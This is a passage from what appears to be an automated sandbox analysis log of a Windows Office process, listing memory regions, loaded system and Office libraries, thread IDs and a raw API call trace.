private name = "private_0x0000000011c50000" filename = "" Region: id = 671 start_va = 0x11c60000 end_va = 0x11c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c60000" filename = "" Region: id = 672 start_va = 0x11c70000 end_va = 0x11c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c70000" filename = "" Region: id = 673 start_va = 0x11c80000 end_va = 0x11c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c80000" filename = "" Region: id = 674 start_va = 0x11c90000 end_va = 0x11c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c90000" filename = "" Region: id = 675 start_va = 0x11870000 end_va = 0x1187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 676 start_va = 0x11c20000 end_va = 0x11c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c20000" filename = "" Region: id = 677 start_va = 0x11c30000 end_va = 0x11c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c30000" filename = "" Region: id = 678 start_va = 0x11c40000 end_va = 0x11c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c40000" filename = "" Region: id = 679 start_va = 0x11c50000 end_va = 0x11c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c50000" filename = "" Region: id = 680 start_va = 0x11c60000 end_va = 0x11c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c60000" filename = "" Region: id = 681 start_va = 0x11c70000 end_va = 0x11c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c70000" filename = "" Region: id = 682 start_va = 0x11c80000 end_va = 0x11c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c80000" filename = "" Region: id = 683 start_va = 0x11c90000 end_va = 0x11c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c90000" filename = "" Region: id = 684 start_va = 0x11ca0000 end_va = 0x11caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ca0000" filename = "" Region: id = 685 start_va = 0x11cb0000 end_va = 0x11cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011cb0000" filename = "" Region: id = 686 start_va = 0x11cc0000 end_va = 0x11ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011cc0000" filename = "" Region: id = 687 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 688 start_va = 0x11c40000 end_va = 0x11e0cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c40000" filename = "" Region: id = 689 start_va = 0x11e10000 end_va = 0x11fe9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e10000" filename = "" Region: id = 690 start_va = 0x11ff0000 end_va = 0x11ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ff0000" filename = "" Region: id = 691 start_va = 0x12000000 end_va = 0x1200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012000000" filename = "" Region: id = 692 start_va = 0x12010000 end_va = 0x1201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012010000" filename = "" Region: id = 693 start_va = 0x12010000 end_va = 0x1201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012010000" filename = "" Region: id = 694 start_va = 0x12010000 end_va = 0x1201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012010000" filename = "" Region: id = 695 start_va = 0x12020000 end_va = 0x1202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012020000" filename = "" Region: id = 696 start_va = 0x12030000 end_va = 0x1203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012030000" filename = "" Region: id = 697 start_va = 0x12020000 end_va = 0x1202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012020000" filename = "" Region: id = 698 start_va = 0x12020000 end_va = 0x12020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012020000" filename = "" Region: id = 699 start_va = 0x12030000 end_va = 0x1203efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012030000" filename = "" Region: id = 700 start_va = 0x12040000 end_va = 0x1204efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012040000" filename = "" Region: id = 701 start_va = 0x12050000 end_va = 0x12102fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012050000" filename = "" Region: id = 702 start_va = 0x71590000 end_va = 0x7179cfff monitored = 0 entry_point = 0x7167acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 703 start_va = 0x12020000 end_va = 0x1202cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012020000" filename = "" Region: id = 704 start_va = 0x12030000 end_va = 0x1203cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012030000" filename = "" Region: id = 705 start_va = 0x12110000 end_va = 0x12110fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 706 start_va = 0x71540000 end_va = 0x71551fff monitored = 0 entry_point = 0x71544510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 707 start_va = 0x71510000 end_va = 0x7153efff monitored = 0 entry_point = 0x7151bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 708 start_va = 0x71470000 end_va = 0x7150afff monitored = 0 entry_point = 0x714af7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 709 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 710 start_va = 0x71420000 end_va = 0x7146efff monitored = 0 entry_point = 0x7142d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 711 start_va = 0x71410000 end_va = 0x71417fff monitored = 0 entry_point = 0x71411fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 712 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 713 start_va = 0x12120000 end_va = 0x1212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012120000" filename = "" Region: id = 714 start_va = 0x11e10000 end_va = 0x11e12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 715 start_va = 0x11e20000 end_va = 0x11e2cfff monitored = 0 entry_point = 0x11e27b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 716 start_va = 0x11880000 end_va = 0x1197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 717 start_va = 0x686e0000 end_va = 0x6871afff monitored = 0 entry_point = 0x686f56aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msproof7.dll") Region: id = 718 start_va = 0x11980000 end_va = 0x11980fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 719 start_va = 0x68690000 end_va = 0x686d8fff monitored = 0 entry_point = 0x68696450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 720 start_va = 0x11980000 end_va = 0x11981fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011980000" filename = "" Region: id = 721 start_va = 0x11990000 end_va = 0x11990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011990000" filename = "" Region: id = 722 start_va = 0x119a0000 end_va = 0x119affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119a0000" filename = "" Region: id = 723 start_va = 0x119b0000 end_va = 0x119b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119b0000" filename = "" Region: id = 724 start_va = 0x119a0000 end_va = 0x119affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119a0000" filename = "" Region: id = 725 start_va = 0x11e20000 end_va = 0x11f15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 726 start_va = 0x119a0000 end_va = 0x119a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119a0000" filename = "" Region: id = 727 start_va = 0x119c0000 end_va = 0x119c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119c0000" filename = "" Region: id = 728 start_va = 0x119d0000 end_va = 0x119d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119d0000" filename = "" Region: id = 729 start_va = 0x119e0000 end_va = 0x119e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119e0000" filename = "" Region: id = 730 start_va = 0x12130000 end_va = 0x122d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cambria.ttc" filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc") Region: id = 731 start_va = 0x11f20000 end_va = 0x11f21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f20000" filename = "" Region: id = 732 start_va = 0x11f30000 end_va = 0x11f31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f30000" filename = "" Region: id = 733 start_va = 0x11f40000 end_va = 0x11f41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f40000" filename = "" Region: id = 734 start_va = 0x11f50000 end_va = 0x11f51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f50000" filename = "" Region: id = 735 start_va = 0x11f60000 end_va = 0x11f61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f60000" filename = "" Region: id = 736 start_va = 0x11f70000 end_va = 0x11f71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f70000" filename = "" Region: id = 737 start_va = 0x11f80000 end_va = 0x11f81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f80000" filename = "" Region: id = 738 start_va = 0x11f90000 end_va = 0x11f91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f90000" filename = "" Region: id = 739 start_va = 0x122e0000 end_va = 0x123d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 740 start_va = 0x11fa0000 end_va = 0x11fa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011fa0000" filename = "" Region: id = 741 start_va = 0x11fb0000 end_va = 0x11fb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011fb0000" filename = "" Region: id = 742 start_va = 0x11fc0000 end_va = 0x11fc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011fc0000" filename = "" Region: id = 743 start_va = 0x11fd0000 end_va = 0x11fd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011fd0000" filename = "" Region: id = 744 start_va = 0x11fe0000 end_va = 0x11fe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011fe0000" filename = "" Region: id = 745 start_va = 0x123e0000 end_va = 0x123e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000123e0000" filename = "" Region: id = 746 start_va = 0x123f0000 end_va = 0x123f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000123f0000" filename = "" Region: id = 747 start_va = 0x68600000 end_va = 0x6868ffff monitored = 0 entry_point = 0x68607345 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msspell7.dll") Region: id = 748 start_va = 0x12400000 end_va = 0x12587fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 749 start_va = 0x68590000 end_va = 0x685f7fff monitored = 0 entry_point = 0x6859c3f5 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7en.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7en.dll") Region: id = 750 start_va = 0x11980000 end_va = 0x11980fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "excludedictionaryen0409.lex" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\ExcludeDictionaryEN0409.lex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\excludedictionaryen0409.lex") Region: id = 751 start_va = 0x68500000 end_va = 0x68582fff monitored = 0 entry_point = 0x6850fbe4 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\css7data0009.dll") Region: id = 752 start_va = 0x12590000 end_va = 0x12717fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 753 start_va = 0x12720000 end_va = 0x12c7bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\nl7models0009.dll") Region: id = 754 start_va = 0x11980000 end_va = 0x11982fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7cm_en.dub") Region: id = 755 start_va = 0x11990000 end_va = 0x119aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7wre_en.dub") Region: id = 756 start_va = 0x68490000 end_va = 0x684f3fff monitored = 0 entry_point = 0x684968c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\1033\\msgr8en.dll") Region: id = 757 start_va = 0x12c80000 end_va = 0x13481fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.lex") Region: id = 758 start_va = 0x119d0000 end_va = 0x119d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.dub") Region: id = 759 start_va = 0x13490000 end_va = 0x13536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013490000" filename = "" Region: id = 760 start_va = 0x13540000 end_va = 0x135f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013540000" filename = "" Region: id = 761 start_va = 0x9a40000 end_va = 0x9a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 762 start_va = 0x9a50000 end_va = 0x9a51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a50000" filename = "" Region: id = 763 start_va = 0x9a60000 end_va = 0x9a61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a60000" filename = "" Region: id = 764 start_va = 0x9a70000 end_va = 0x9a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a70000" filename = "" Region: id = 765 start_va = 0x9a80000 end_va = 0x9a80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a80000" filename = "" Region: id = 766 start_va = 0x9a90000 end_va = 0x9a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a90000" filename = "" Region: id = 767 start_va = 0x13600000 end_va = 0x13af1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013600000" filename = "" Region: id = 768 start_va = 0x9aa0000 end_va = 0x9aa1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009aa0000" filename = "" Region: id = 769 start_va = 0x67b40000 end_va = 0x6848afff monitored = 0 entry_point = 0x67bbec48 region_type = mapped_file name = "igx.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\IGX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\igx.dll") Region: id = 770 start_va = 0x9ab0000 end_va = 0x9ab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ab0000" filename = "" Region: id = 771 start_va = 0x9ac0000 end_va = 0x9ac0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ac0000" filename = "" Region: id = 772 start_va = 0x67b20000 end_va = 0x67b32fff monitored = 0 entry_point = 0x67b225d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 773 start_va = 0x67b00000 end_va = 0x67b13fff monitored = 0 entry_point = 0x67b03c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 774 start_va = 0x67a90000 end_va = 0x67af7fff monitored = 0 entry_point = 0x67ab70a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 775 start_va = 0x6f9e0000 end_va = 0x6f9e7fff monitored = 0 entry_point = 0x6f9e1920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 776 start_va = 0x6f9f0000 end_va = 0x6fa36fff monitored = 0 entry_point = 0x6fa058d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 777 start_va = 0x6f970000 end_va = 0x6f9d3fff monitored = 0 entry_point = 0x6f98afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 778 start_va = 0x9ab0000 end_va = 0x9ab2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ab0000" filename = "" Region: id = 779 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 780 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 781 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 782 start_va = 0x9ac0000 end_va = 0x9ac0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ac0000" filename = "" Region: id = 783 start_va = 0x9ab0000 end_va = 0x9aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ab0000" filename = "" Region: id = 784 start_va = 0x9af0000 end_va = 0x9beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009af0000" filename = "" Region: id = 785 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 786 start_va = 0x9bf0000 end_va = 0x9bf9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 787 start_va = 0x67980000 end_va = 0x67a89fff monitored = 0 entry_point = 0x679e1e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 788 start_va = 0x6f8e0000 end_va = 0x6f8e7fff monitored = 0 entry_point = 0x6f8e1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 789 start_va = 0x9c00000 end_va = 0x9c02fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c00000" filename = "" Region: id = 790 start_va = 0x9c10000 end_va = 0x9c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c10000" filename = "" Thread: id = 1 os_tid = 0x1378 Thread: id = 2 os_tid = 0x1368 Thread: id = 3 os_tid = 0x1364 Thread: id = 4 os_tid = 0x1360 Thread: id = 5 os_tid = 0x135c Thread: id = 6 os_tid = 0x1354 Thread: id = 7 os_tid = 0x134c Thread: id = 8 os_tid = 0x1348 Thread: id = 9 os_tid = 0x1344 Thread: id = 10 os_tid = 0x1340 Thread: id = 11 os_tid = 0x133c Thread: id = 12 os_tid = 0x1338 Thread: id = 13 os_tid = 0x1334 Thread: id = 14 os_tid = 0x1330 Thread: id = 15 os_tid = 0x1328 Thread: id = 16 os_tid = 0x1310 [0100.250] DispCallFunc (pvInstance=0xf5ea49c, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x198170) returned 0x0 [0100.252] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x691311d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x198080 | out: lpThreadId=0x198080*=0xd50) returned 0xbbc [0100.253] PeekMessageA (in: lpMsg=0x198060, hWnd=0x70132, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x198060) returned 0 [0100.281] NtdllDefWindowProc_A (hWnd=0x70132, Msg=0x1c, wParam=0x0, lParam=0xd44) returned 0x0 [0100.292] GetActiveWindow () returned 0x0 [0100.293] CRetailMalloc_Alloc () returned 0xc9cf2a0 [0100.293] CRetailMalloc_Realloc () returned 0xc790cb0 [0100.294] CRetailMalloc_Alloc () returned 0xc820258 [0100.294] CRetailMalloc_Realloc () returned 0xb396780 [0100.294] memcpy (in: _Dst=0x197a00, _Src=0x197a28, _Size=0x4 | out: _Dst=0x197a00) returned 0x197a00 [0100.294] realloc (_Block=0x0, _Size=0x100) returned 0xcb65188 [0100.294] memcpy (in: _Dst=0xcb65188, _Src=0x197a00, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.294] memcpy (in: _Dst=0x197a10, _Src=0x197a44, _Size=0xc | out: _Dst=0x197a10) returned 0x197a10 [0100.294] realloc (_Block=0x0, _Size=0x60) returned 0xcb65290 [0100.294] memcpy (in: _Dst=0xcb65290, _Src=0x197a10, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb3153fc, cbMultiByte=12, lpWideCharStr=0x11590418, cchWideChar=26 | out: lpWideCharStr="ojsqqKJ9Xsmw") returned 12 [0100.295] CRetailMalloc_Realloc () returned 0xc9cb2c0 [0100.295] memcpy (in: _Dst=0xc736044, _Src=0x11590414, _Size=0x1e | out: _Dst=0xc736044) returned 0xc736044 [0100.295] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.295] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.295] memcpy (in: _Dst=0xcb65188, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.295] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b062e, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0100.295] CRetailMalloc_Realloc () returned 0xc9cbd88 [0100.296] wcscpy_s (in: _Destination=0xc736068, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0100.296] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.296] CRetailMalloc_Realloc () returned 0xc9097f8 [0100.296] memcpy (in: _Dst=0xcb65188, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.296] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.349] memcpy (in: _Dst=0x197904, _Src=0x197978, _Size=0x8 | out: _Dst=0x197904) returned 0x197904 [0100.349] memcpy (in: _Dst=0xc9fc4b8, _Src=0x197904, _Size=0x8 | out: _Dst=0xc9fc4b8) returned 0xc9fc4b8 [0100.349] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb315434, cbMultiByte=6, lpWideCharStr=0x1159161e, cchWideChar=14 | out: lpWideCharStr="h7BmNH") returned 6 [0100.349] memcpy (in: _Dst=0xc736078, _Src=0x1159161a, _Size=0x12 | out: _Dst=0xc736078) returned 0xc736078 [0100.349] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.350] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.350] memcpy (in: _Dst=0xcb65188, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.350] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b062e, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0100.350] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.350] memcpy (in: _Dst=0xcb65188, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.350] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.350] memcpy 